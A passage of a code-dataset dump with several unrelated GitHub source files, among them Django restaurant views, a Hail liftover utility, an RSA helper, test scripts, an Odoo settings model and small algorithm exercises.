print(\"Table\", table_id, \"ordered\")\n for cart in cart:\n proceed_order = 'proceed_order'\n cart_food = cart.carted_food.all()\n for food in cart_food:\n try:\n order = Order.objects.get(table_id = auth.get_user(request), billed = False)\n except Order.DoesNotExist:\n order = Order.objects.create(table_id=auth.get_user(request))\n order_state = Order_State.objects.create(order=order, food=food, state='ordered')\n print(food.food_name)\n print('==============================================')\n cart.delete()\n hasOrder = False\n total = 0\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = True\n state = Order_State.objects.filter(order = bill)\n for state in state:\n if state.state != 'cancelled':\n total += state.food.price\n except Order.DoesNotExist:\n hasOrder = False\n args = {'hasOrder': hasOrder, 'total': total, 
'proceed_order': proceed_order}\n return render(\n request,\n 'restaurant/block_home.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef return_order(request):\n index = int(request.POST.get('index'))\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n orderedFood = Order_State.objects.filter(order = bill)\n counter = 0;\n for food in orderedFood:\n if counter == index:\n if food.state == 'ordered' or food.state == 'making':\n food.state = 'cancelled'\n food.save()\n print('====================================')\n print(\"Table\", auth.get_user(request), \"cancelled\")\n print(food.food.food_name)\n print('====================================')\n break\n else:\n counter = counter + 1\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef get_order_state(request):\n bill = Order.objects.filter(table_id = auth.get_user(request), billed = False)\n lists = Order_State.objects.filter(order = bill[0]).only('state')\n result = []\n for state in lists:\n result.append(state.state)\n return JsonResponse(result, safe=False)\n\n@login_required(redirect_field_name='login')\ndef service_add_water(request):\n print(\"Table\", auth.get_user(request), \"requested for adding water\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef service_clean_table(request):\n print(\"Table\", auth.get_user(request), \"requested for table cleaning\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef service_baby_chair(request):\n print(\"Table\", auth.get_user(request), \"requested for baby chair\")\n return HttpResponse('')\n\n@login_required(redirect_field_name='login')\ndef bill_page(request):\n table_id = auth.get_user(request)\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n state = Order_State.objects.filter(order = bill)\n id = bill.order_id\n time = bill.timestamp\n result = []\n total = 0;\n for state in state:\n if state.state != \"cancelled\":\n result.append(state)\n total += state.food.price\n args = {'result': result, 'id': id, 'total': total}\n return render(\n request,\n 'restaurant/bill.html',\n args,\n )\n\n@login_required(redirect_field_name='login')\ndef force_logout(request):\n try:\n bill = Order.objects.get(table_id = auth.get_user(request), billed = False)\n hasOrder = 'true'\n except Order.DoesNotExist:\n hasOrder = 'false'\n return HttpResponse(hasOrder)\n\ndef thankyou(request):\n return render(\n request,\n 'restaurant/thankyou.html',\n )\n","repo_name":"tsehowang/FYP2","sub_path":"restaurantFYP/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34948050487","text":"# eam\n# 2021-03-12\n\nfrom gnomad.utils.liftover import *\n\nimport logging\nimport hail as hl\n\nfrom utils.generic import current_date\n\nlogging.basicConfig(\n format=\"%(asctime)s (%(name)s %(lineno)s): %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S %p\",\n)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nnfs_dir = 'file:///home/ubuntu/data'\n\n\ndef liftover_intervals(t: hl.Table,\n keep_missing_interval: bool = False) -> hl.Table:\n \"\"\"\n Liftover locus in intervals from one coordinate system (hg37) to another (hg38)\n\n # Example input table description\n #\n # ----------------------------------------\n # Global fields:\n # None\n # ----------------------------------------\n # Row fields:\n # 
'interval': interval>\n # ----------------------------------------\n # Key: ['interval']\n # ----------------------------------------\n\n\n :param t: Table of intervals on GRCh37\n :param keep_missing_interval: If True, keep missing (non-lifted) intervals in the output Table.\n :return: Table with intervals lifted over GRCh38 added.\n \"\"\"\n\n rg37 = hl.get_reference(\"GRCh37\")\n rg38 = hl.get_reference(\"GRCh38\")\n\n if not rg37.has_liftover(\"GRCh38\"):\n rg37.add_liftover(\n f'{nfs_dir}/resources/liftover/grch37_to_grch38.over.chain.gz', rg38\n )\n\n t = t.annotate(\n start=hl.liftover(t.interval.start, \"GRCh38\"),\n end=hl.liftover(t.interval.end, \"GRCh38\"),\n )\n\n t = t.filter(\n (t.start.contig == \"chr\" + t.interval.start.contig)\n & (t.end.contig == \"chr\" + t.interval.end.contig)\n )\n\n t = t.key_by()\n\n t = (t\n .select(interval=hl.locus_interval(t.start.contig,\n t.start.position,\n t.end.position,\n reference_genome=rg38,\n invalid_missing=True),\n interval_hg37=t.interval\n )\n )\n\n # bad intervals\n missing = t.aggregate(hl.agg.counter(~hl.is_defined(t.interval)))\n logger.info(\n f\"Number of missing intervals: {missing[True]} out of {t.count()}...\"\n )\n\n # update globals annotations\n global_ann_expr = {'date': current_date(),\n 'reference_genome': 'GRCh38',\n 'was_lifted': True\n }\n t = t.annotate_globals(**global_ann_expr)\n\n if not keep_missing_interval:\n logger.info(\n f\"Filtering out {missing[True]} missing intervals...\"\n )\n t = t.filter(hl.is_defined(t.interval), keep=True)\n\n return t.key_by(\"interval\")\n\n","repo_name":"enriquea/wes_chd_ukbb","sub_path":"utils/liftover.py","file_name":"liftover.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1504827328","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n# @Author: Merack\n# @Email: merack@qq.com\n\nimport rsa\n\n\n# 用Python实现的no Padding 方式的RSA加密(因为校园网的js中的RSA加密用就是no Padding模式,而Python中的RSA库没有这个模式,真坑 -_-)\n# 来源: https://www.cnblogs.com/pythonClub/p/10464745.html\nclass Encrypt(object):\n def __init__(self, e, m):\n self.e = e\n self.m = m\n\n def encrypt(self, message):\n mm = int(self.m, 16)\n ee = int(self.e, 16)\n rsa_pubkey = rsa.PublicKey(mm, ee)\n crypto = self._encrypt(message.encode(), rsa_pubkey)\n return crypto.hex()\n\n def _pad_for_encryption(self, message, target_length):\n message = message[::-1]\n max_msglength = target_length - 11\n msglength = len(message)\n\n padding = b''\n padding_length = target_length - msglength - 3\n\n for i in range(padding_length):\n padding += b'\\x00'\n\n return b''.join([b'\\x00\\x00', padding, b'\\x00', message])\n\n def _encrypt(self, message, pub_key):\n keylength = rsa.common.byte_size(pub_key.n)\n padded = self._pad_for_encryption(message, keylength)\n\n payload = rsa.transform.bytes2int(padded)\n encrypted = rsa.core.encrypt_int(payload, pub_key.e, pub_key.n)\n block = rsa.transform.int2bytes(encrypted, keylength)\n\n return block\n","repo_name":"Merack/fosuNet","sub_path":"Encrypt.py","file_name":"Encrypt.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2360163783","text":"\"\"\"Thit is test program\"\"\"\n\nfrom typing import List\nfrom _path import SYSTEM_AREA\nfrom logging import Logger\n\nfrom logger_gen import set_logger\nfrom src.shape.shaper import Shaper\n\nimport os\n\nif __name__ == \"__main__\":\n 
print(f\"test_shaper: connect to {SYSTEM_AREA}\")\n\n\ndef process(logger: Logger, paths):\n\n shaping = Shaper(\n logger=logger,\n batch_size=3,\n visualize_graph=False,\n visualize_noise=False,\n visualize_interpolation=False,\n visualize_all=False,\n single_proc=False,\n redo=True,\n )\n\n paths = path_creater(paths)\n\n # run test code\n shaping(paths)\n\n\ndef path_creater(paths):\n new_paths = []\n for path in paths:\n ret, same_list = get_same_files(path[0])\n\n if not ret:\n continue\n\n for same_file in same_list:\n\n f_name = os.path.basename(same_file)\n out_dir = os.path.dirname(path[2])\n out_file = \".\".join([f_name.split(\".\")[0], \"sh\"])\n out_path = os.path.join(out_dir, out_file)\n\n new_paths.append(\n (\n same_file,\n path[1],\n out_path,\n )\n )\n return new_paths\n\n\ndef get_same_files(path) -> List[str]:\n \"\"\"Check if the results of trim-area and face-mesh exist.\"\"\"\n dir_path = os.path.dirname(path)\n target_file = os.path.basename(path)\n\n target_name, target_ext = target_file.split(\".\")\n target_name = target_name.split(\"_\")\n\n same_list = []\n\n file_list = os.listdir(dir_path)\n exist_flg = False\n for file in file_list:\n if not os.path.isfile(os.path.join(dir_path, file)):\n continue\n\n f_name, f_ext = file.split(\".\")\n f_name = f_name.split(\"_\")\n\n if f_ext != target_ext:\n continue\n\n flg = False\n for idx, t_n in enumerate(target_name):\n if t_n != f_name[idx]:\n flg = True\n break\n if not flg:\n exist_flg = True\n same_list.append(os.path.join(dir_path, file))\n\n return exist_flg, same_list\n\n\nif __name__ == \"__main__\":\n log = set_logger(\"TEST-SHAPE\", \"log/test/test-shp.log\")\n path_list = [\n (\n \"test/face_mesh/out/webcame.hp\",\n \"./data/test/webcame.mp4\",\n \"test/shape/out/webcame.sh\",\n ),\n (\n \"test/face_mesh/out/webcame2.hp\",\n \"./data/test/webcame2.mp4\",\n \"test/shape/out/webcame2.sh\",\n ),\n (\n \"test/face_mesh/out/webcame3.hp\",\n \"./data/test/webcame3.mp4\",\n \"test/shape/out/webcame3.sh\",\n ),\n (\n \"test/face_mesh/out/webcame4.hp\",\n \"./data/test/webcame4.mp4\",\n \"test/shape/out/webcame4.sh\",\n ),\n (\n \"test/face_mesh/out/webcame5.hp\",\n \"./data/test/webcame5.mp4\",\n \"test/shape/out/webcame5.sh\",\n ),\n (\n \"test/face_mesh/out/webcame6.hp\",\n \"./data/test/webcame6.mp4\",\n \"test/shape/out/webcame6.sh\",\n ),\n # (\n # \"test/face_mesh/out/webcame7.hp\",\n # \"./data/test/webcame7.mp4\",\n # \"test/shape/out/webcame7.sh\",\n # ),\n # (\n # \"test/face_mesh/out/webcame8.hp\",\n # \"./data/test/webcame8.mp4\",\n # \"test/shape/out/webcame8.sh\",\n # ),\n # (\n # \"test/face_mesh/out/webcame9.hp\",\n # \"./data/test/webcame9.mp4\",\n # \"test/shape/out/webcame9.sh\",\n # ),\n # (\n # \"test/face_mesh/out/short1.hp\",\n # \"./data/test/short1.mp4\",\n # \"test/shape/out/short1.sh\",\n # ),\n # (\n # \"test/face_mesh/out/short2.hp\",\n # \"./data/test/short2.mp4\",\n # \"test/shape/out/short2.sh\",\n # ),\n # (\n # \"test/face_mesh/out/midol1s.hp\",\n # \"./data/test/midol1s.mp4\",\n # \"test/shape/out/midol1s.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test1.hp\",\n # \"./data/test/test1.mp4\",\n # \"test/shape/out/test1.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test2.hp\",\n # \"./data/test/test2.mp4\",\n # \"test/shape/out/test2.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test3.hp\",\n # \"./data/test/test3.mp4\",\n # \"test/shape/out/test3.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test4.hp\",\n # \"./data/test/test4.mp4\",\n # \"test/shape/out/test4.sh\",\n # ),\n # (\n # 
\"test/face_mesh/out/test5.hp\",\n # \"./data/test/test5.mp4\",\n # \"test/shape/out/test5.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test6.hp\",\n # \"./data/test/test6.mp4\",\n # \"test/shape/out/test6.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test7.hp\",\n # \"./data/test/test7.mp4\",\n # \"test/shape/out/test7.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test8.hp\",\n # \"./data/test/test8.mp4\",\n # \"test/shape/out/test8.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test9.hp\",\n # \"./data/test/test9.mp4\",\n # \"test/shape/out/test9.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test10.hp\",\n # \"./data/test/test10.mp4\",\n # \"test/shape/out/test10.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test11.hp\",\n # \"./data/test/test11.mp4\",\n # \"test/shape/out/test11.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test12.hp\",\n # \"./data/test/test12.mp4\",\n # \"test/shape/out/test12.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test13.hp\",\n # \"./data/test/test13.mp4\",\n # \"test/shape/out/test13.sh\",\n # ),\n # (\n # \"test/face_mesh/out/test14.hp\",\n # \"./data/test/test14.mp4\",\n # \"test/shape/out/test14.sh\",\n # ),\n ]\n process(log, path_list)\n","repo_name":"MTamon/FaceMotionDetection","sub_path":"test/shape/test_shaper.py","file_name":"test_shaper.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9230808612","text":"from ..database import DatabaseConnection\nclass products:\n def __init__(self, product_id,product_name,brand,category,model_year,list_price):\n self.product_id = product_id\n self.product_name = product_name\n self.brand = brand\n self.category = category\n self.model_year = model_year\n self.list_price = list_price\n def __str__(self):\n return f\"{self.product_name},{self.brand},{self.category},{self.model_year}\"\n @classmethod\n def get_product_by_id(cls, producto_id):\n query = '''\n SELECT\n p.product_id,\n p.product_name,\n b.brand_id,\n b.brand_name,\n c.category_id,\n c.category_name,\n p.model_year,\n p.list_price\n FROM\n products p\n JOIN brands b ON p.brand_id = b.brand_id\n JOIN categories c ON p.category_id = c.category_id\n WHERE\n p.product_id = %s\n '''\n params = (producto_id,)\n result = DatabaseConnection.fetch_one(query, params)\n if result is not None:\n return products(\n product_id=result[0],\n product_name=result[1],\n brand={\"brand_id\": result[2], \"brand_name\": result[3]},\n category={\"category_id\": result[4], \"category_name\": result[5]},\n model_year=result[6],\n list_price=result[7]\n )\n else:\n return None\n\n @classmethod\n def create_product(cls, product):\n query = '''\n INSERT INTO products (product_name, brand_id, category_id, model_year, list_price)\n VALUES (%s, %s, %s, %s, %s)\n '''\n values = (product.product_name, product.brand, product.category, product.model_year, product.list_price)\n\n connection = DatabaseConnection.get_connection()\n cursor = connection.cursor()\n cursor.execute(query, values)\n connection.commit()\n cursor.close()\n return True\n\n @classmethod\n def get_all_products(cls):\n query = '''\n SELECT\n p.product_id,\n p.product_name,\n b.brand_id,\n b.brand_name,\n c.category_id,\n c.category_name,\n p.model_year,\n p.list_price\n FROM\n products p\n JOIN brands b ON p.brand_id = b.brand_id\n JOIN categories c ON p.category_id = c.category_id\n '''\n results = DatabaseConnection.fetch_all(query)\n products_list = []\n\n for result in results:\n products_list.append({\n \"product_id\": 
result[0],\n "product_name": result[1],\n "brand": {"brand_id": result[2], "brand_name": result[3]},\n "category": {"category_id": result[4], "category_name": result[5]},\n "model_year": result[6],\n "list_price": result[7]\n })\n\n return products_list\n \n \n @classmethod\n def guardar_cambios_en_db(cls, product):\n query = '''\n UPDATE products\n SET product_name = %s, brand_id = %s, category_id = %s, model_year = %s, list_price = %s\n WHERE product_id = %s\n '''\n values = (\n product.product_name,\n product.brand.get('brand_id'), \n product.category.get('category_id'), \n product.model_year,\n product.list_price,\n product.product_id\n )\n connection = DatabaseConnection.get_connection()\n cursor = connection.cursor()\n cursor.execute(query, values)\n connection.commit() \n cursor.close()\n return True\n \n","repo_name":"Loboxos/tp3.2-Upateco-python-flask-mysql","sub_path":"tp3.2/app/models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35437982873","text":"class Node(object):\r\n    def __init__(self, data=None, nextNode=None):\r\n        self.data = data\r\n        self.nextNode = nextNode\r\n\r\n    def getData(self):\r\n        return self.data\r\n\r\n    def getNext(self):\r\n        return self.nextNode\r\n\r\n    def setNext(self, newNext):\r\n        self.nextNode = newNext\r\n\r\nclass linkedList(object):\r\n    def __init__ (self, head=None):\r\n        self.head = head\r\n    \r\n    def insert(self, newNode):\r\n        newNode.setNext(self.head)\r\n        self.head=newNode\r\n    \r\n    def size(self):\r\n        current=self.head\r\n        count = 0\r\n        while current:\r\n            count+=1\r\n            current=current.getNext()\r\n        return count\r\n    \r\n    def search(self, data):\r\n        current=self.head\r\n        found = False\r\n        while current and found is False:\r\n            if current.getData() == data:\r\n                found = True\r\n            else:\r\n                current = current.getNext()\r\n        if current is None:\r\n            raise ValueError ("Nothing here")\r\n        return current\r\n\r\n    def delete(self,data):\r\n        current=self.head\r\n        previous=None\r\n        found=False\r\n        while current and found is False:\r\n            if current.getData()==data:\r\n                found = True\r\n            else:\r\n                previous = current\r\n                current=current.getNext()  # bug fix: getNext must be called; assigning the bound method broke traversal\r\n        if current is None:\r\n            raise ValueError("nothing here!")\r\n        if previous is None:\r\n            self.head = current.getNext()\r\n        else:\r\n            previous.setNext(current.getNext())\r\n\r\n    def read(self):\r\n        current=self.head\r\n        while current is not None:\r\n            print (current.getData())\r\n            current=current.getNext()\r\n\r\nnewNode=Node("hello")\r\nnewNode2=Node("how are you")\r\nlList = linkedList(Node("n-scheme"))\r\nlList.insert(newNode)\r\nlList.insert(Node("cacatuas multiples"))\r\nlList.read()\r\nprint(lList.head.getData())\r\n","repo_name":"felix-hh/Sample-Code","sub_path":"Sample code/Data structures/LinkedList1.py","file_name":"LinkedList1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42382026887","text":"from tkinter import *\r\nfrom PIL import Image, ImageTk, ImageDraw\r\n\r\nreference = []\r\nfor i in range(10):\r\n    reference.append([])\r\n    for j in range(25):\r\n        reference[i].append(0)\r\n\r\n\r\ndef get_reference():\r\n    global reference_pil_img, reference\r\n    all_pix = reference_pil_img.load()\r\n\r\n    for n in range(10):\r\n\r\n        for x in range(5):\r\n            #print(100 * n + 20 * x)\r\n            for y in range(5):\r\n\r\n                for i in range(20):\r\n                    for j in range(27):\r\n                        if(all_pix[100 * n + 20 * x + i, 27 * y 
+ j][0] <= 127):\n reference[n][5 * x + y] += 1\n\n #for k in reference:\n # print(k)\n\n\n\ndef find_digit():\n global original_pil_img, reference\n all_pix = original_pil_img.load()\n digit = []\n for i in range(25):\n digit.append(0)\n\n for x in range(5):\n for y in range(5):\n\n for i in range(20):\n for j in range(27):\n if (all_pix[20 * x + i, 27 * y + j][0] <= 127):\n digit[5 * x + y] += 1\n\n min_delta = 1000000\n min_n = -1\n\n for n in range(10):\n sum = 0\n for k in range(25):\n sum += abs(reference[n][k] - digit[k])\n if(sum <= min_delta):\n min_delta = sum\n min_n = n\n\n print(min_n)\n\n #print(digit)\n\n\noriginal_pil_img = Image.open('img5.jpg')\nreference_pil_img = Image.open('reference.jpg')\nget_reference()\nfind_digit()","repo_name":"GooS69/image_processing","sub_path":"main5.py","file_name":"main5.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26614820473","text":"from collections import deque\n\nn = int(input())\nS = input()\nT = input()\n\nif sorted(S) != sorted(T):\n print(\"No\")\n exit()\n\n\ndef check(k):\n right = deque(S[k:])\n for t in T:\n if right[0] == t:\n right.popleft()\n if len(right) == 0:\n return True\n return False\n\n\nng = -1\nok = n\n\nwhile ok - ng > 1:\n mid = (ok + ng) // 2\n\n if check(mid):\n ok = mid\n else:\n ng = mid\nprint(ok)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-154/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22245084938","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\n# Standard Library\nimport sqlite3\n\n# External Libraries\nfrom path import path\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\ndef get_db(name=':memory:', databases={}, row_factory=dict_factory):\n\n if isinstance(name, sqlite3.Connection):\n return name\n\n if name != ':memory:':\n name = path(name).abspath()\n\n if not name.dirname().exists():\n raise Exception('Can\\'t create db as path doesn\\'t exit')\n\n conn = databases.get(name) or sqlite3.connect(name)\n conn.row_factory = row_factory\n databases[name] = conn\n return conn\n","repo_name":"NorthIsUp/dorm","sub_path":"dorm/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6025705796","text":"def input_int(msg, error_msg: str) -> int:\n while True:\n try:\n temp = int(input(str(msg)))\n except:\n print(error_msg)\n else:\n return temp\n\ndef input_int_range(msg, start: int, end: int, type_error_msg: str, range_error_msg: str) -> int:\n while True:\n temp = input_int(msg, type_error_msg)\n if temp >= start and temp <= end:\n return temp\n else:\n print(range_error_msg)\n\ndef main():\n item_count = input_int(\"Enter the amount of items to process: \", \"ERROR: Enter a correct value\")\n items = []\n\n for _ in range(item_count):\n name = input(\"Enter the product's name: \")\n id = input(\"Enter the product's identifier: \")\n amount = input_int(\"Enter item's purchased amount: \", \"ERROR: Enter a correct value\")\n unit_price = input_int(\"Enter item's unit price: \", \"ERROR: Enter a correct value\")\n iva_type = input_int_range(\"Enter IVA type:\\n 1. Tax free\\n 2. Goods\\n 3. 
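The ARC-154/B solution in the record above is the standard "binary search over the answer" pattern: check(k) tests whether the suffix S[k:] survives as a greedy subsequence match into T, and that predicate is monotone in k, so the ok/ng loop converges on the smallest valid k. A generic, hypothetical sketch of that loop (min_true is an illustrative name):

def min_true(ng: int, ok: int, pred) -> int:
    # precondition: pred is monotone; pred is False at ng (often a -1 sentinel)
    # and True at ok (often an n sentinel meaning "trivially satisfiable")
    while ok - ng > 1:
        mid = (ok + ng) // 2
        if pred(mid):
            ok = mid   # keep shrinking the smallest known-True point
        else:
            ng = mid   # raise the largest known-False point
    return ok

# the record's final answer would then be: print(min_true(-1, n, check))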
General\\n> ", 1, 3, "ERROR: Enter a correct option", "ERROR: Enter a correct value")\n        iva_percentage = {1: 0.0, 2: 0.05, 3: 0.19}.get(iva_type, 0)\n        subtotal = (unit_price * amount)\n\n        items.append({"name": name, "id": id, "amount": amount, "unit_price": unit_price, "iva_type": iva_type, "iva_percentage": iva_percentage, "subtotal": subtotal})\n    \n    print("\\n".join([(\n        f'- {item["name"]} | [{item["id"]}]\\n'.upper() +\n        f'  Amount: {item["amount"]}\\n' +\n        f'  Unit Price: ${item["unit_price"]:,}\\n'.replace(",", ".") +\n        f'  IVA: {({1: "Tax Free 0%", 2: "Goods 5%", 3: "General 19%"}.get(item["iva_type"]))}\\n' +\n        f'  Subtotal price: ${item["subtotal"]:,}\\n'.replace(",", ".") +\n        f'  Total price: ${round(item["subtotal"] * (1 + item["iva_percentage"])):,}\\n'.replace(",", ".")\n    )for item in items]))\n\nif __name__ == "__main__":\n    main()","repo_name":"AxonDesigns/SENA_ADSO","sub_path":"python/VentaItems.py","file_name":"VentaItems.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"3886268185","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n\nimport os\nfrom pathlib import Path\n\nVERSION_MODULE_PATH = os.path.join(Path(os.path.dirname(__file__)).parents[0], "graphtage", "version.py")\n\n\ndef get_version_string():\n    attrs = {}\n    with open(VERSION_MODULE_PATH) as f:\n        exec(f.read(), attrs)\n    vstring = attrs['VERSION_STRING']\n    if 'git' in vstring:\n        return vstring\n    else:\n        return f"v{vstring}"\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'Graphtage'\ncopyright = '2020, Trail of Bits'\nauthor = 'Evan Sultanik'\n\n# The full version, including alpha/beta/rc tags\nrelease = get_version_string()\nversion = release\ngithub_url = 'https://github.com/trailofbits/graphtage/'\nif 'git' not in version:\n    github_url = f"{github_url}releases/tag/{ version }"\n\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n    'sphinx.ext.autodoc',\n    'sphinx.ext.napoleon',\n    'sphinx.ext.intersphinx',\n    'sphinx.ext.todo',\n    'sphinx.ext.autosectionlabel',\n    'sphinx_rtd_theme',\n    #'sphinxcontrib.fulltoc'\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. 
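get_version_string() in the conf.py above pulls VERSION_STRING out of graphtage/version.py by exec()ing its source into a scratch dict, which avoids importing (and therefore installing) the package while Sphinx builds. A hypothetical generalization of that trick (read_module_attr is an illustrative name):

def read_module_attr(path: str, attr: str):
    # execute the module's source in an isolated namespace instead of importing it
    namespace = {}
    with open(path) as f:
        exec(f.read(), namespace)
    return namespace[attr]

# e.g. read_module_attr(VERSION_MODULE_PATH, "VERSION_STRING")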
See the documentation for\n# a list of builtin themes.\n#\n#html_theme = 'classic'\nhtml_theme = 'sphinx_rtd_theme'\n\nhtml_theme_options = {\n    'canonical_url': f'https://trailofbits.github.io/graphtage/latest/',\n    'logo_only': False,\n    'display_version': False,  # This is manually configured in our custom templates\n    'prev_next_buttons_location': 'bottom',\n    'style_external_links': True,\n    #'vcs_pageview_mode': '',\n    #'style_nav_header_background': 'white',\n    # Toc options\n    'collapse_navigation': True,\n    'sticky_navigation': True,\n    'navigation_depth': 4,\n    'includehidden': True,\n    'titles_only': False\n}\n\nhtml_context = {\n    'github_url': github_url\n}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named "default.css" will overwrite the builtin "default.css".\nhtml_static_path = ['_static']\n\n#html_js_files = [\n#    'localtoc.js',\n#]\n\n\ndef skip(app, what, name, obj, would_skip, options):\n    if name == "__init__":\n        return False\n    return would_skip\n\n\ndef docstring_callback(app, what, name, obj, options, lines: list):\n    if what == 'class' or what == 'function':\n        if lines and lines[0].strip():\n            lines.insert(1, '')\n            lines.insert(2, name)\n            lines.insert(3, '*' * len(name))\n            if len(lines) == 4:\n                lines.append('')\n\n\ndef setup(app):\n    app.connect("autodoc-skip-member", skip)\n    #app.connect('autodoc-process-docstring', docstring_callback)\n\n\nadd_package_names = False\n# prefix each section label with the name of the document it is in, followed by a colon\nautosectionlabel_prefix_document = True\nintersphinx_mapping = {'python': ('https://docs.python.org/3', None)}\nnapoleon_include_private_with_doc = True\nnapoleon_include_special_with_doc = True\ntodo_include_todos = True\n\n#autodoc_default_options = {\n#    'inherited-members': True\n#}\n","repo_name":"trailofbits/graphtage","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":2275,"dataset":"github-code","pt":"37"}
{"seq_id":"7936496181","text":"import sys\nimport collections\n\nsys.stdin = open('1373.txt', 'r')\ninp = collections.deque(list(sys.stdin.readline().strip()))\n\nr = collections.deque([])\ni, n = 0, 0\n\nwhile inp:\n    tmp = int(inp.pop())\n\n    if tmp:\n        n += 2 ** i\n    i += 1\n\n    if i == 3 or not inp:\n        r.insert(0, str(n))\n        i, n = 0, 0\n\n# while r != ['0'] and r[0] == '0':\nwhile len(r) > 1 and r[0] == '0':\n    r.popleft()\nfor rr in r:\n    print(rr, end='')\n","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_1373_28.py","file_name":"baek_1373_28.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"34158955221","text":"from odoo import api, fields, models\nfrom ast import literal_eval\n\nclass SchoolSettings(models.TransientModel):\n    _inherit = 'res.config.settings'\n\n    school_student_enable_configuration = fields.Boolean(string="Enable Configuration")\n    school_student_default_age = fields.Char(string='Age')\n    product_default = fields.Many2one('product.product', string='Default Product')\n    # many2many gives you multi-select options, while many2one only gives a single-select option\n    # to use many2many, we declare an intermediate table to connect the 2 tables together.\n    # in this example, I create a new table named 'config_product_rel'\n    # with 2 columns connecting the 2 tables: 'id' for the 
'ir_config_parameter' table (the current table)\n    # and 'product_id' for the 'product_product' table\n    product_default_many2many = fields.Many2many('product.product', 'config_product_rel', 'id', 'product_id',\n                                                 'Default Product Many2many')\n\n    @api.model\n    def get_values(self):\n        res = super(SchoolSettings, self).get_values()\n        res['school_student_enable_configuration'] = self.env['ir.config_parameter'].sudo().get_param('school.school_student_enable_configuration')\n        res['school_student_default_age'] = self.env['ir.config_parameter'].sudo().get_param('school.school_student_default_age')\n        res['product_default'] = int(self.env['ir.config_parameter'].sudo().get_param('school.product_default'))\n\n        # set values for many2many field\n        if self.env['ir.config_parameter'].sudo().get_param('school.product_default_many2many'):\n            product_default_many2many = self.env['ir.config_parameter'].sudo().get_param('school.product_default_many2many')\n            res['product_default_many2many'] = [(6, 0, literal_eval(product_default_many2many))]\n\n        return res\n\n\n    def set_values(self):\n        super(SchoolSettings, self).set_values()\n        self.env['ir.config_parameter'].set_param('school.school_student_enable_configuration', self.school_student_enable_configuration)\n        self.env['ir.config_parameter'].set_param('school.school_student_default_age', self.school_student_default_age)\n        # get value for many2one field\n        self.env['ir.config_parameter'].set_param('school.product_default', self.product_default.id)\n        # get values for many2many field\n        